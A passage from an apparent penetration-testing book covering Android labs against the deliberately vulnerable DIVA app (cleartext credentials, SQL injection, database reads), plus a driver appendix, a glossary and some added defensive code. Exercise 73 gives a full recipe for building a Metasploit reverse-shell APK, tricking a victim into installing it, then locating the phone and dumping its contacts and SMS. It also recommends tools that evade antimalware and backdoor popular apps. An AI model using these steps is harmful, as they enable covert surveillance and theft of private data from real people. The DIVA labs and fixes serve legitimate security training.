3. Make sure the adb terminal is running.
4. Connect the phone via USB cable to the PC.
5. Answer OK to allow USB debugging on the phone.
6. In the adb terminal type >adb devices
7. In the adb terminal type >./adb devices
8. Notice that although I am connected to the phone, I don't have root
permission because the device is not rooted. I have the shell user's
permissions, with limited access to some files and folders inside the phone.
9. Type >./adb shell
10. Type #whoami (the user is shell)
11. Type #ls -al (notice that some folders show "permission denied"
because the user shell does not have root privileges, as the phone is
not rooted)
12. Type #top to see the running processes in the phone
13. Type Ctrl + C

Exercise 68: Downloading a file or folder from Phone to PC

1. Navigate to the file/folder you want to download:
>./adb shell
#cd sdcard
#cd DCIM
#cd screenshots
#pwd
2. Copy the complete path to the files you want to download.
3. Use the pull command to download a folder or a file from the phone to
the PC, and the push command to upload files from the PC to the phone.
4. Type >./adb pull /sdcard/DCIM/screenshots
5. The folder will be downloaded to the Windows machine with all its
contents.

Exercise 69: Installing APK files into Android Virtual machine

In this exercise we are going to download the DIVA APK. DIVA (Damn
Insecure and Vulnerable App) is an Android app intentionally designed to be
insecure. The aim of the app is to teach developers/QA/security
professionals the flaws that are generally present in apps due to poor or
insecure coding practices.

1. From the PC, download DIVA from the following link:
http://www.payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz
2. Extract the archive into the same ADB folder.
3. Start the Android virtual device from Android Studio.
4. Make sure the diva-beta.apk file was extracted successfully.
5. Install the diva-beta.apk file: >./adb install diva-beta.apk
6. In the Android virtual device start DIVA.

Exercise 70: Getting Mobile App username and password

Mobile applications store app-related data inside the mobile phone in a
folder; if the app stores data in clear text, we can read the data via the adb
tool or any Android malware. In this exercise we are going to check the
DIVA app to see the user credentials, because this app stores data in
clear text.

1. In the virtual Android phone start the DIVA app.
2. From PC PowerShell start ./adb shell to get shell access to the
virtual phone.
3. Make sure that you have root access: #whoami
4. If you don't have root access, type #exit
5. Type ./adb root to get root access, then ./adb shell to go back to
the device shell.
6. Type cd /data/data (to show all mobile apps' data folders)
7. The mobile app we are testing is DIVA, so we can see a folder
called jakhar.aseem.diva
8. Type #cd jakhar.aseem.diva
9. Type #ls -l
10. Type #cd shared_prefs/
11. Type #cat jakhar.aseem.diva_preferences.xml
12. Reading the XML file shows the username and password used by the
application to access application resources.
13. We can use these credentials to access the account from another
device and see and change the information related to that user.
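Reading one preferences file by hand works for a single app; an assessor usually wants to triage every shared_prefs file pulled from a device. The following is an added example, not code from the book or from DIVA: it parses a SharedPreferences XML file and reports `<string>` entries whose key name looks like a credential, plus any value that is a Luhn-valid payment card number regardless of its key. The sample file, its keys and values are all constructed for the example; in practice you would `adb pull` the file from /data/data/<package>/shared_prefs/ and run the function on it.

```python
import re
import xml.etree.ElementTree as ET

# Constructed shared_prefs file for a hypothetical app: the layout follows
# Android's SharedPreferences XML format, but the keys and values are invented.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="user">admin</string>
    <string name="password">SuperSecret1</string>
    <string name="theme">dark</string>
    <boolean name="first_run" value="false" />
    <string name="api_token">ZXhhbXBsZS10b2tlbi12YWx1ZQ==</string>
    <string name="saved_card">4111111111111111</string>
    <string name="order_ref">1234567890123</string>
</map>
"""

# Key names that commonly hold credentials or secrets (constructed list).
SECRET_KEY_RE = re.compile(
    r"(pass(word|wd|phrase)?|pwd|secret|token|api[_-]?key|credential|user(name)?|login)",
    re.IGNORECASE,
)
# Payment card numbers are 13 to 19 digits.
CARD_RE = re.compile(r"^\d{13,19}$")


def luhn_valid(digits):
    """Luhn checksum used by payment card numbers: from the right, double
    every second digit, subtract 9 from doubles above 9, sum, check mod 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def find_cleartext_secrets(xml_text):
    """Return (key, value, reason) for every <string> entry that looks like a
    credential by key name, or like a payment card number by value."""
    root = ET.fromstring(xml_text)
    findings = []
    for el in root:
        if el.tag != "string":
            continue
        key = el.get("name", "")
        value = (el.text or "").strip()
        if SECRET_KEY_RE.search(key):
            findings.append((key, value, "credential-like key"))
        elif CARD_RE.match(value) and luhn_valid(value):
            findings.append((key, value, "Luhn-valid card number"))
    return findings


if __name__ == "__main__":
    for key, value, reason in find_cleartext_secrets(SAMPLE_PREFS):
        print(f"{key:12} {reason:24} {value}")
```

The Luhn check matters because a 13 to 19 digit value is not automatically a card number (the constructed order_ref above fails the checksum and is not reported). The remediation for an app that shows up here is not to store the secret in SharedPreferences at all: keep a short-lived server-issued token instead of the password, and protect anything that must persist with keys held in the Android Keystore.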
Exercise 71: Mobile App SQL injection

Mobile applications store their data either on the device itself or on a
server. Offline apps store all their data on the mobile device, whereas
online apps depend on access to a server for their stored data in order to
function; e-commerce apps, for example, fall into the online category.
In this exercise we are going to use the DIVA app's SQL injection
vulnerability to show the mobile user data.

1. Start Android Studio, then start the virtual phone.
2. Start adb.
3. Start the DIVA app on the virtual phone.
4. In the PC adb terminal type >./adb logcat (this will provide us with
real-time logging of all device activity).
5. In the virtual phone DIVA app, enter a single quotation mark in
the search bar and click search.
6. In the adb terminal hit Ctrl + C to stop the logging.
7. Look at the SQLiteLog error: ' ' ' in SELECT * FROM sqluser
WHERE user = ' ' '
8. The logcat shows the SQL query run by the application to search
for the user " ' ": a select query to find a user " ' ".
9. Start the adb logging again: >./adb logcat
10. In the virtual phone DIVA app search, enter 'or 1=1; and click
search.
11. The app will show a pop-up screen that shows the user names and
passwords, plus credit card numbers, of all users.
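The logcat line in step 7 is the whole story: the search term is concatenated straight into the SQL text, so a lone quote breaks the statement and a crafted term rewrites it. The following added example (not DIVA's code, and not from the book) reproduces both the vulnerable query and its parameterised fix against an in-memory SQLite database, and adds a small logcat filter that surfaces SQLiteLog errors, which is how the exercise spotted the flaw in the first place. The table name sqliuser comes from the exercise; the column names, rows and logcat lines are constructed. Python's sqlite3 module rejects anything other than whitespace or a comment left over after a statement, so instead of the book's `'or 1=1;` the example uses `' OR 1=1 --`, where the comment marker swallows the closing quote the app appends.

```python
import re
import sqlite3

# Constructed data standing in for DIVA's sqliuser table: the table name is
# the one the exercise reads; the column names and rows are invented here.
SAMPLE_USERS = [
    ("admin", "passw0rd", "4111111111111111"),
    ("alice", "wonderland", "5500000000000004"),
    ("bob", "builder", "340000000000009"),
]


def make_db():
    """In-memory SQLite database mimicking the app's local store."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE sqliuser (user TEXT, password TEXT, credit_card TEXT)"
    )
    conn.executemany("INSERT INTO sqliuser VALUES (?, ?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def vulnerable_search(conn, term):
    """The pattern logcat exposed: the search term is glued into the SQL.
    Returns (rows, error); a syntax error is what a lone quote produces."""
    sql = "SELECT * FROM sqliuser WHERE user = '" + term + "'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)


def safe_search(conn, term):
    """Parameterised query: the term is bound as data, never parsed as SQL."""
    cur = conn.execute("SELECT * FROM sqliuser WHERE user = ?", (term,))
    return cur.fetchall()


# Constructed logcat lines in the "level/tag: message" layout; the SQLiteLog
# error is the kind of line the exercise reads after a single quote is searched.
SAMPLE_LOGCAT = """\
D/HypotheticalApp: search clicked
E/SQLiteLog: (1) unrecognized token: "'''"
I/HypotheticalApp: search finished
"""
LOG_RE = re.compile(r"^E/SQLiteLog:\s*(?P<msg>.*)$")


def sqlite_errors(logcat_text):
    """Pull SQLiteLog error messages out of logcat output: a malformed query
    reaching the database is a strong hint that user input is being
    concatenated into SQL."""
    messages = []
    for line in logcat_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            messages.append(m.group("msg"))
    return messages


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, injected term:", vulnerable_search(db, "' OR 1=1 --"))
    print("vulnerable, lone quote   :", vulnerable_search(db, "'"))
    print("safe, injected term      :", safe_search(db, "' OR 1=1 --"))
    print("logcat SQLite errors     :", sqlite_errors(SAMPLE_LOGCAT))
```

With the parameterised query the injected term simply matches no user, and the lone quote is a legitimate (if odd) search string rather than a syntax error; the absence of SQLiteLog errors under the same inputs is the quickest way to confirm a fix from the device side.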

Exercise 72: Reading SQLite database in Android Phone

1. Continue from the previous exercise and start adb shell to get a
shell on the virtual phone: >./adb shell
2. Type #cd /data/data
3. Type #ls
4. Go to jakhar.aseem.diva, which is the folder that contains the data of
the DIVA mobile application:
5. #cd jakhar.aseem.diva
6. #ls
7. #cd database
8. #ls to see the content of the database folder
9. #sqlite3 sqli to get the SQL command prompt
10. sqlite> .tables (to see the tables of the database)
11. sqlite> select * from sqliuser; (to read the content of the sqliuser
table)
12. As you can see, the content of the sqliuser table is all the
application users with their passwords and credit card numbers.

Exercise 73: Hacking Real Android phone

In this exercise we are going to hack a real Android phone using a malicious
APK file that we are going to create using Metasploit. The APK file will
create a backdoor in the Android phone. In this exercise I am going to use a
Samsung Galaxy S8+ with the latest software release from Samsung and a
cloud-based server to access the phone.
Note
You can easily get a free cloud server from Amazon, Google Cloud or
Microsoft Azure; you just need to register with one of the providers
mentioned and create your own server. Installing Kali Linux in a Google Cloud
server is a bit complicated, so instead I used the Google-provided Ubuntu
image. Both Kali and Ubuntu are Debian-based Linux distributions; the only
difference is that in Ubuntu you will need to install penetration testing tools
manually. Part of this exercise procedure is installing Metasploit in Ubuntu.
The exercise steps are:
1. Create the APK file using Metasploit inside the cloud server (Kali
Linux or Ubuntu Server; I am using Google Cloud, so it was much
easier for me to install Ubuntu Server).
2. Put the APK file inside a web server (the same cloud server).
3. Convince the victim through social engineering or other means to
download the APK file to his phone and enable the feature of
running APKs from external sources.
4. Listen for the connection from the phone using Metasploit in the cloud
server.
5. Control the phone: get the phone location, images, videos, and
messages.

6. Depending on the cloud provider you use, start the cloud server.
(Installing and running a cloud server is outside the scope of this
book; however, it is very easy and there are a lot of help resources
provided by service providers and others on the Internet.)
7. I am using the Google Cloud console.
8. Note that the server has an internal IP address when it is not running,
but when it is started it will take an external IP address that we are
going to use in the APK file.
9. If you want a permanent external IP address, then you must pay 3
to 4 dollars a month for it.

10. You will need to have SSH and RDP software installed in your
Windows to connect to the cloud server.
11. I am using PuTTY to get fast access to the cloud server shell
and RDP to have a desktop from the G-Cloud server.
12. Start PuTTY and connect to the G-Cloud server.
13. Use PuTTY public key authentication for secure access to the server.
14. Update the server:
#sudo apt-get update
#sudo apt-get upgrade
15. If you are running Ubuntu, you will need to install the Metasploit
console:
#sudo apt-get install metasploit-framework
16. Create the APK file:
#sudo msfvenom -p android/meterpreter/reverse_tcp LHOST=<the
external IP address> LPORT=4444 R > malicious.apk
(LPORT can be 4444 or any other free port.)
17. Move the malicious.apk file to the web server:
#sudo mv malicious.apk /var/www/html
18. Check that the web server is running: #sudo systemctl status apache2
19. If it is not active, start it: #sudo service apache2 start
20. Set up Metasploit to listen for incoming connections on port 4444.
21. #sudo msfconsole
22. Configure msfconsole:
msf6> use exploit/multi/handler
>set payload android/meterpreter/reverse_tcp
>set LHOST <external IP address of G-Cloud>
>set LPORT <same port used in creating the APK file>
>exploit

23. From the Android phone open Web browser and enter the external
IP address of your cloud server
24. Follow the instructions to download and install the APK file into
the phone ( see screenshot below
25. You need to have install apk from external sources enabled in your
S_E_Oblako

android phone
S_E_Oblako

26. When Apk file installation is done successfully you will have a
meterpreter session on the server (see below screenshot)
S_E_Oblako

27. Type sysinfo to see android OS info


28. Type help to see available android specific commands

29. To check if the phone rooted or not, type >check_root


S_E_Oblako

30. To know the phone location, type >geolocate

You can take the latitude and longitude numbers and input them in Google
Maps to see the phone location on the map

31. to dump all phone contact to a file in the server, type


>dump_contacts

32. To dump all sms from the phone to the server, type >dump_sms
S_E_Oblako
S_E_Oblako
S_E_Oblako

Note
The APK file generated by msfvenom is not a reliable APK file and
sometimes it does not work, and Android antimalware programs can detect it
very easily and stop it from working. There are many tools available on
GitHub that generate more efficient and evasive APK files that can pass
Android antimalware programs.
The most popular APK generating tool is Evil-Droid
(https://github.com/M4sc3r4n0/Evil-Droid).
Evil-Droid can also inject a backdoor APK file into another APK file. You
can download any well-known APK file for a game or app from third-party APK
stores and then use Evil-Droid to inject the backdoor APK file. Anyone who
runs the injected APK file will connect back to the attacker server. The
process of injecting the backdoor is done automatically in a step-by-step
GUI that guides you through the whole process.

17. Appendix 1: Realtek Driver update

This procedure installs the driver for wireless USB adapters that have the
Realtek chipset RTL8812AU or RTL8811AC.

1. Kali 2020.1, running kernel 5.4, has a major problem with many USB
Wi-Fi adapters that used to run with prior Kali versions (Kali 19.4 and
earlier).
2. Check the version of the USB Wi-Fi adapter you have with the command

#lsusb

3. Check the Kali version

4. Install the Linux headers in Kali Linux

#apt-get update && apt-get upgrade
#apt-get install linux-headers-$(uname -r)

5. Get the driver source code

#git clone https://github.com/aircrack-ng/rtl8812au

6. Install DKMS

DKMS (Dynamic Kernel Module Support) is a tool for automatically compiling
and installing kernel modules and managing drivers that access the kernel
directly.

#apt-get install dkms

7. To install the rtl8812au driver

#cd rtl8812au
#./dkms-install.sh
#dkms status

8. Disconnect the Wi-Fi adapter

9. Reboot Kali
10. Connect the Wi-Fi adapter
11. Check that the Wi-Fi adapter is running in Kali
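The three points where the procedure above silently fails are an adapter with an unsupported chipset (step 2), headers installed for a different kernel than the one booted (step 4), and a DKMS module that was added or built but never installed (step 7). The script below is an added example, not from the book or the aircrack-ng project, that checks each of these; the USB ids it matches (0bda:8812, 0bda:881a, 0bda:a811) are assumed, and the sample tool output is constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the book: offline checks for the three points
# where the Realtek driver procedure can silently fail. Each function takes
# the tool output as a string so it can be run against the constructed
# samples below or, with --live, against real lsusb/dpkg/dkms output.

# Assumption: USB ids for the chipsets the appendix covers (Realtek vendor
# id 0bda). 0bda:8812 and 0bda:881a are RTL8812AU, 0bda:a811 is RTL8811AU.
REALTEK_IDS="0bda:8812 0bda:881a 0bda:a811"

# adapter_present LSUSB_TEXT: step 2. Prints the matching lsusb line and
# returns 0 when one of the supported ids is present, 1 otherwise.
adapter_present() {
  local lsusb_text="$1" id
  for id in $REALTEK_IDS; do
    if printf '%s\n' "$lsusb_text" | grep -iq "ID $id"; then
      printf '%s\n' "$lsusb_text" | grep -i "ID $id" | head -n 1
      return 0
    fi
  done
  return 1
}

# headers_match KERNEL_RELEASE INSTALLED_PKGS: step 4. The DKMS build needs
# linux-headers-$(uname -r); a header package for a kernel other than the
# one currently booted (common right after apt-get upgrade) does not count.
headers_match() {
  local kernel="$1" pkgs="$2"
  printf '%s\n' "$pkgs" | grep -qxF "linux-headers-$kernel"
}

# dkms_installed DKMS_STATUS_TEXT KERNEL_RELEASE: step 7. True only when
# `dkms status` lists the rtl8812au module as installed for that kernel,
# not merely "added" or "built".
dkms_installed() {
  local status_text="$1" kernel="$2"
  printf '%s\n' "$status_text" | grep -F 'rtl8812au' | grep -F "$kernel" \
    | grep -q 'installed'
}

# Constructed sample output (shaped like the Kali 2020.1 tools, not
# captured from a real machine).
SAMPLE_LSUSB='Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 003: ID 0bda:8812 Realtek Semiconductor Corp. RTL8812AU 802.11a/b/g/n/ac 2T2R DB WLAN Adapter'
SAMPLE_KERNEL='5.4.0-kali4-amd64'
SAMPLE_HEADERS='linux-headers-5.4.0-kali4-amd64
linux-headers-5.4.0-kali4-common'
SAMPLE_DKMS='rtl8812au, 5.6.4.2~20200318, 5.4.0-kali4-amd64, x86_64: installed'

if [ "${1:-}" = "--live" ]; then
  # Real checks on a Kali box (needs lsusb, dpkg-query and dkms installed).
  kernel="$(uname -r)"
  adapter_present "$(lsusb)" || echo "no supported Realtek adapter found"
  headers_match "$kernel" "$(dpkg-query -W -f='${Package}\n' 'linux-headers-*')" \
    || echo "headers for running kernel $kernel are missing"
  dkms_installed "$(dkms status)" "$kernel" \
    || echo "rtl8812au is not installed for $kernel"
fi
```

Run it with `--live` on the Kali machine after step 7; any message printed names the step to go back to.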

18. Appendix 2: Glossary

Acronym (Stands for): Definition

APT (Advanced Persistent Threat): A cyber-attack that continuously uses advanced techniques to conduct cyber espionage or crime.

APWG (Anti-Phishing Working Group): An international consortium that brings together businesses affected by phishing attacks with security companies, law enforcement, government, trade associations, and others.

AV (Antivirus): A computer program used to prevent, detect, and remove malware.

AVIEN (Anti-Virus Information Exchange Network): A group of antivirus and security specialists who share information regarding AV companies, products, malware and other threats.

CAPTCHA (Completely Automated Public Turing Test to Tell Computers and Humans Apart): A response test used in computing, especially on websites, to confirm that a user is human instead of a bot.

CARO (Computer Antivirus Research Organization): An organization established in 1990 to study malware.

CAVP (Cryptographic Algorithm Validation Program): This program provides validation testing of FIPS-approved and NIST-recommended cryptographic algorithms and individual components. Cryptographic algorithm validation is a necessary precursor to cryptographic module validation.

CBC (Cipher Block Chaining): Operation for a block cipher using an initialization vector and a chaining mechanism. This will cause the decryption of a block of cipher text to depend on preceding cipher text blocks.

CBC-MAC (Cipher Block Chaining Message Authentication Code): This constructs a message authentication code from a block cipher. The message is encrypted with some block cipher algorithm in CBC mode. This creates a chain of blocks with each block depending on the correct encryption of the previous block.

CERIAS (Center for Education and Research in Information Assurance and Security): A part of Purdue University dedicated to research and education in information security.

CERT (Computer Emergency Response Team): In this case, an expert group that handles computer security incidents and alerts organizations about them.

CHAP (Challenge-Handshake Authentication Protocol): A protocol for authentication that provides protection against replay attacks through the use of a changing identifier and a variable challenge-value.

CIRT (Computer Incident Response Team): A group that handles events involving computer security and data breaches.

CIS (Center for Internet Security): A 501 nonprofit organization with a mission to "Identify, develop, validate, promote, and sustain best practice solutions for cyber defense and build and lead communities to enable an environment of trust in cyberspace."

CISA (Certified Information Systems Auditor): Professionals who monitor, audit, control, and assess information systems.

CISM (Certified Information Systems Security Manager): A certification offered by ISACA which "Demonstrates your understanding of the relationship between an information security program and broader business goals and objectives."

CISO (Chief Information Security Officer): The CISO is the executive responsible for an organization's information and data security. Increasingly, this person aligns security goals with business enablement or digital transformation. CISOs are also increasingly in a "coaching role" helping the business manage cyber risk. This is according to Ponemon Institute research.

CISSP (Certified Information Systems Security Professional): The CISSP is a security certification for security analysts, offered by ISC(2). It was designed to indicate that a person has learned certain standardized knowledge in cybersecurity.

CNAP (Cybersecurity National Action Plan): A U.S. plan to enhance cybersecurity awareness and protections, protect privacy, maintain public safety, and economic and national security.

CNCI (Comprehensive National Cybersecurity Initiative): A U.S. government initiative designed to establish a front line of defense against network intrusion, defend the U.S. against the threats through counterintelligence, and strengthen the cybersecurity environment.

CND (Computer Network Defense): CND is defined by the U.S. Department of Defense (DoD) as "Actions taken through the use of computer networks to protect, monitor, analyze, detect, and respond to unauthorized activity within Department of Defense information systems and computer networks." This style of defense applies to the private sector as well.

COBIT (Control Objectives for Information and Related Technologies): An IT management framework including practices, tools and models for risk management and compliance.

CSEC (Cyber Security Education Consortium): The CSEC, also known as the CEC, partners with educators and the broader cybersecurity community to ensure students are prepared to lead and be changemakers in the cybersecurity workforce.

CSA (Cloud Security Alliance): The Cloud Security Alliance is the world's leading organization for defining best practices in cloud cybersecurity. It also provides a cloud security provider certification program, among other things.

CSO (Chief Security Officer): In some cases, the Chief Security Officer is in charge of an organization's entire security posture or strategy. This includes both physical security and cybersecurity. In other cases, this title belongs to the most senior role in charge of cybersecurity.

CSSIA (Center for Systems Security and Information Assurance): The CSSIA is a U.S. leader in training cybersecurity educators. It provides these teachers and professors with real-world learning experiences in information assurance and network security.

CVE (Common Vulnerabilities and Exposures): CVE® is a list of entries (each containing an identification number, a description, and at least one public reference) for publicly known cybersecurity vulnerabilities. CVE Entries are used in numerous cybersecurity products and services from around the world, including the U.S. National Vulnerability Database (NVD).

CVSS (Common Vulnerability Scoring System): An industry standard for rating the severity of security vulnerabilities. CVSS attempts to assign severity scores to vulnerabilities, allowing responders to prioritize responses and resources according to threat.

DDoS (Distributed Denial of Service): A distributed denial-of-service (DDoS) attack attempts to disrupt the normal traffic of a targeted server, service or network to make a service such as a website unusable by "flooding" it with malicious traffic or data from multiple sources (often botnets).

DLP (Data Loss Prevention): An information security strategy to protect corporate data. DLP is a set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized users, either inside or outside of an organization.

DNS attack (Domain Name Server attack): DNS uses the name of a website to direct traffic to its own IP address. Amazon.com should take you to Amazon's website, for example. During this type of attack, which is complex and appears in several ways, cybercriminals can redirect you to another site for their own purposes. This attack takes advantage of the communication back and forth between clients and servers.

EDR (Endpoint Detection & Response): Endpoint Detection & Response solutions are designed to detect and respond to endpoint anomalies. EDR solutions are not designed to replace IDPS solutions or firewalls but extend their functionality by providing in-depth endpoint visibility and analysis. EDR uses different datasets, which facilitates advanced correlations and detection.

FISMA (Federal Information Security Management Act): FISMA is United States legislation which requires each federal agency to develop, document, and implement an agency-wide program to provide information security for its information systems and data. The act recognized the importance of information security to the economic and national security interests of the United States.

FISMA (Federal Information Security Modernization Act (2014)): A law that assigns responsibilities within the U.S. federal government for setting and complying with policies to secure agencies' information systems. For example, the Department of Homeland Security administers cybersecurity policies and the Office of Management and Budget provides oversight.

FISSEA (Federal Information Systems Security Educators' Association): An organization run by and for information systems security professionals to assist federal agencies in meeting their information systems security awareness, training, and education responsibilities.

GRC (Governance, Risk Management, and Compliance): Three parts of a strategy for managing an organization's overall governance, enterprise risk management and compliance with regulations. Cybersecurity people, practices and tools play a key part in GRC for many organizations.

HTTPS (Secure Hypertext Transfer Protocol): An extension of the Hypertext Transfer Protocol. It is used for secure communication over a computer network by encrypting the information you send from your computer to another website, for example. It is a means of ensuring privacy and security, and also a way of authenticating that the site you're on is the one you intended to visit.

IA (Information Assurance): Measures that protect and defend information and information systems by ensuring their availability, integrity, authentication, confidentiality, and non-repudiation.

IAM (Identity and access management): IAM is a framework of policies and technologies for ensuring that the proper people in an enterprise have the appropriate access to technology resources. This helps organizations maintain "least privileged" or "zero trust" account access, where employees only have access to the minimum amount of data needed for their roles.

IBE (Identity-Based Encryption): A type of public-key encryption in which the public key of a user is some unique information about the identity of the user, like a user's email address, for example.

IDS/IDP (Intrusion Detection/Intrusion Detection and Prevention): Intrusion Detection Systems (IDS) analyze network traffic for signatures that match known cyberattacks. Intrusion Prevention Systems (IPS) analyze packets as well, but can also stop the packet from being delivered based on what kind of attacks it detects, helping to stop the attack.

ISACA (Information Systems Audit and Control Association): ISACA provides certifications for IT security, audit and risk management professionals. ISACA also maintains the COBIT framework for IT management and governance. ISACA was incorporated in 1969 by a small group of individuals who recognized a need for a centralized source of information and guidance in the growing field of auditing controls for computer systems. Today, ISACA serves professionals in 180 countries.

ISAKMP (Internet Security Association and Key Management Protocol): A protocol for establishing Security Associations and cryptographic keys in an Internet environment. ISAKMP only provides a framework for authentication and key exchange and is designed to be key exchange independent.

ISAP (Information Security Automation Program): The ISAP is a U.S. government agency initiative to enable automation and standardization of technical security operations. Its standards-based design may benefit those in the private sector as well.

(ISC)² (International Information Systems Security Certification Consortium): A non-profit organization which specializes in training and certification for cybersecurity professionals. Certifications include the CISSP.

ISO (International Organization for Standardization): An organization that develops international standards of many types, including two major information security management standards, ISO 27001 and ISO 27002.

ISSA (Information Systems Security Association): ISSA is a not-for-profit, international organization of information security professionals and practitioners.

ISSO (Information Systems Security Officer): Individual with assigned responsibility for maintaining the appropriate operational security posture for an information system or program.

ISSPM (Information Systems Security Program Manager): The ISSPM, sometimes called an IT Security Manager, coordinates and executes security policies and controls, as well as assesses vulnerabilities within a company. They are often responsible for data and network security processing, security systems management, and security violation investigation.

JSM (Java Security Manager): To use Java security to protect a Java application from performing potentially unsafe actions, you can enable a security manager for the JVM in which the application runs. The security manager enforces a security policy, which is a set of permissions (system access privileges) that are assigned to code sources.

MS-ISAC (Multi-State Information Sharing and Analysis Center): The mission of the MS-ISAC is to improve the overall cybersecurity posture of the nation's state, local, tribal and territorial governments through focused cyber threat prevention, protection, response, and recovery.

MSSP (Managed Security Services Provider): Provides outsourced monitoring and management of security devices and systems. Common services include managed firewall, intrusion detection, virtual private network, vulnerability scanning and anti-viral services.

NCS (National Cryptologic School): A school within the National Security Agency. The NCS provides the NSA workforce and its Intelligence Community and Department of Defense partners highly-specialized cryptologic training, as well as courses in leadership, professional development, and over 40 foreign languages.

NCSA (National Cyber Security Alliance): A non-profit working with the Department of Homeland Security, private sector sponsors, and nonprofit collaborators to promote cyber security awareness for home users, small and medium size businesses, and primary and secondary education.

NCSAM (National Cyber Security Awareness Month): NCSAM is a collaborative effort between government and industry to raise awareness about the importance of cybersecurity and to ensure that all Americans have the resources they need to be safer and more secure online. It occurs each year in October. The security awareness month started with a joint effort by the National Cyber Security Division within the Department of Homeland Security and the nonprofit National Cyber Security Alliance.

NCSD (National Cyber Security Division): A division of the Office of Cyber Security & Communications with the mission of collaborating with the private sector, government, military, and intelligence stakeholders to conduct risk assessments and mitigate vulnerabilities and threats to information technology assets and activities affecting the operation of the civilian government and private sector critical cyber infrastructures.

NICCS (National Initiative for Cybersecurity Careers and Studies): An online resource for cybersecurity training that connects government employees, students, educators, and industry with cybersecurity training providers throughout the United States.

NICE (National Initiative for Cybersecurity Education): The mission of NICE is to energize and promote a robust network and an ecosystem of cybersecurity education, training, and workforce development.

NISPOM (National Industrial Security Program Operating Manual): The National Industrial Security Program Operating Manual establishes the standard procedures and requirements for all government contractors with regard to classified information. It covers the entire field of government-industrial security related matters.

NIST (National Institute of Standards and Technology): In cybersecurity circles, NIST is extremely well known for the NIST Cybersecurity Framework, as well as the NIST Risk Management Framework (RMF), NIST 800-53 control guidance, NIST Digital Identity Guidelines and others. The overall NIST mission is to "promote U.S. innovation and industrial competitiveness by advancing measurement science, standards, and technology in ways that enhance economic security and improve our quality of life." NIST is part of the U.S. Department of Commerce.

OPSEC (Operational Security): OPSEC is a term derived from the U.S. military and is an analytical process used to deny an adversary information that could compromise the secrecy and/or the operational security of a mission. Performing OPSEC related techniques can play a significant role in both offensive and defensive cybersecurity strategies.

OSINT (Open Source Intelligence): OSINT is information drawn from publicly available data that is collected, exploited, and reported to address a specific intelligence requirement. In the intelligence community, the term "open" refers to overt, publicly available sources (as opposed to covert or clandestine sources).

PCI-DSS (Payment Card Industry Data Security Standard): The Payment Card Industry Data Security Standard (PCI-DSS) is a set of security standards designed to ensure that all companies that accept, process, store or transmit credit card information maintain a secure environment.

SANS (System Administration, Networking, and Security Institute): A private company that specializes in information security training and security certification.

SIEM (Security Information and Event Management): Security Information and Event Management (SIEM) technology supports threat detection and security incident response through the real-time collection and historical analysis of security events from a wide variety of event and contextual sources.

SOC (Security Operations Center): A central location or team within an organization that is responsible for monitoring, assessing and defending against security issues.

SSO (Single Sign-On): A system which enables users to securely authenticate themselves with multiple applications and websites by logging in with a single set of credentials.

TTP (Tactics, Techniques, and Procedures): The behavior of an actor. A tactic is the highest-level description of this behavior, while techniques give a more detailed description of behavior in the context of a tactic, and procedures an even lower-level, highly detailed description in the context of a technique.

UBA / UEBA (User Behavior Analytics): UBA tracks a system's users, looking for unusual patterns of behavior. In cybersecurity, the process helps detect insider threats and other targeted attacks, including financial fraud. User behavior analytics solutions look at patterns of human behavior, and then apply algorithms and statistical analysis to detect meaningful anomalies from those patterns. This guides efforts to correct unintentional behavior that puts the business at risk, as well as risky and intentional deceit.

VPN (Virtual Private Network): By connecting through a VPN, all the data you send and receive travels through an encrypted "tunnel" so that no one can see what you are transmitting or decipher it if they do get hold of it. VPNs also allow you to hide your physical location and IP address, often displaying the IP address of the VPN service instead.